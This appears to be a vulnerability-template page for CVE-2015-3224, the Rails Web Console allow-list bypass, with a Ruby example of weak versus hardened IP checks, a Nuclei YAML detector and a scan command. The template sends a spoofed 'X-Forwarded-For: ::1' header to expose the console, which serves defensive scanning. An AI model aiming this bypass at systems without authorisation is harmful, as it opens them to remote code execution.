Ruby on Rails Web Console - Remote Code Execution
ID: CVE-2015-3224
Severity: medium
Author: pdteam
Tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails
Description
Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client’s IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
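The weakness described above is an IP allow-list that can be satisfied by a header the client controls. The Ruby snippet below is an added illustration written for this page, not code from the web_console gem, from Rails or from the template: it contrasts an allow-list check that honours X-Forwarded-For with one that uses only the socket peer address, on constructed Rack-style env hashes. The constant name WHITELISTED_IPS, the two helper names and the allow-list contents are assumptions made for the example.

```ruby
require 'ipaddr'

# Constructed allow-list standing in for a whitelisted_ips-style setting
# (an assumption for this illustration, not the web_console gem's own code).
WHITELISTED_IPS = %w[127.0.0.1 ::1].map { |ip| IPAddr.new(ip) }

# Weak check: lets the client choose its own address by sending
# X-Forwarded-For. Anyone can set that header on a direct connection,
# so the allow-list no longer says anything about who is connecting.
def client_ip_trusting_forwarded(env)
  forwarded = env['HTTP_X_FORWARDED_FOR'].to_s
  return forwarded.split(',').first.strip unless forwarded.empty?
  env['REMOTE_ADDR']
end

# Hardened check: uses only the address the TCP peer actually connected from.
# Behind a trusted reverse proxy you would instead honour only the hop that
# proxy appends, after confirming REMOTE_ADDR is the proxy itself.
def client_ip_from_socket(env)
  env['REMOTE_ADDR']
end

# True when ip_string parses and falls inside one of the allow-listed entries;
# unparsable or missing input is treated as not allowed.
def whitelisted?(ip_string)
  return false if ip_string.nil? || ip_string.to_s.empty?
  ip = IPAddr.new(ip_string.to_s)
  WHITELISTED_IPS.any? { |allowed| allowed.include?(ip) }
rescue IPAddr::Error, TypeError
  false
end

# Constructed Rack-style request environments (sample data, not captured traffic):
# a remote peer claiming to be loopback through the header, and a genuine loopback peer.
SPOOFED_ENV = { 'REMOTE_ADDR' => '203.0.113.10', 'HTTP_X_FORWARDED_FOR' => '::1' }.freeze
LOCAL_ENV   = { 'REMOTE_ADDR' => '127.0.0.1' }.freeze

if $PROGRAM_NAME == __FILE__
  [SPOOFED_ENV, LOCAL_ENV].each do |env|
    puts "peer=#{env['REMOTE_ADDR']} xff=#{env['HTTP_X_FORWARDED_FOR'].inspect} " \
         "weak=#{whitelisted?(client_ip_trusting_forwarded(env))} " \
         "hardened=#{whitelisted?(client_ip_from_socket(env))}"
  end
end
```

Run it directly to see the two rows: the spoofed request passes the weak check and fails the hardened one, while the genuine loopback request passes both. The same contrast is what the template's `X-Forwarded-For: ::1` header probes for from the outside.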
YAML Source
id: CVE-2015-3224

info:
  name: Ruby on Rails Web Console - Remote Code Execution
  author: pdteam
  severity: medium
  description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
  impact: |
    Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system.
  remediation: |
    Upgrade to a patched version of Ruby on Rails or disable the Web Console feature.
  reference:
    - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
    - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
    - https://hackerone.com/reports/44513
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3224
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-3224
    cwe-id: CWE-284
    epss-score: 0.92904
    epss-percentile: 0.99025
    cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: web_console
  tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{randstr}}"

    headers:
      X-Forwarded-For: ::1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Rails.root:"
          - "Action Controller: Exception caught"
        condition: and

      - type: word
        part: response
        words:
          - X-Web-Console-Session-Id
          - data-remote-path=
          - data-session-id=
        case-insensitive: true
        condition: or
# digest: 4b0a00483046022100b87680a1bd881ee89965ad473782767654d9e710b2383e54a554aef84dce70ae022100aef5f9162a1192a201f463d6b89b6569df5db0b9981cf05150c18f84aa42782c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-3224.yaml"